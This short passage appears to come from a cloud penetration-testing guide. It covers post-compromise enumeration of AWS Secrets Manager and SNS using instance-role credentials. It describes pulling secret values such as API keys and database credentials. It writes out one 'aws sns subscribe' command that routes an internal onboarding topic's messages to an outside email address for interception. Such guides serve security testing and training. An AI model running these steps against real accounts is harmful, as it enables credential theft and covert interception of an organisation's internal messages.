Secrets & Notification Services
Enumerate and exploit Secrets Manager, SNS topics, or other services that may leak sensitive data.
Secrets Manager Enumeration & Exfiltration
List All Secrets (if permitted)
Retrieve Secret Valuesnote
If a role or user attached to the instance (via IMDS) has secretsmanager:GetSecretValue
, you can retrieve high-value secrets (API keys, database credentials, etc.).
Simple Notification Service (SNS) Enumeration
Identify Topic ARNs If youβve discovered an SNS topic ARN (e.g., via Secrets Manager or CloudFormation), subscribe to it to intercept messages (which sometimes contain provisioning or βonboardingβ notifications).
Subscribe to a topicaws sns subscribe \
--topic-arn arn:aws:sns:us-east-1:<ACCOUNT_ID>:Onboarding_New_Internal_Dev_Msg_01 \
--protocol email \
--notification-endpoint [email protected] \
--region us-east-1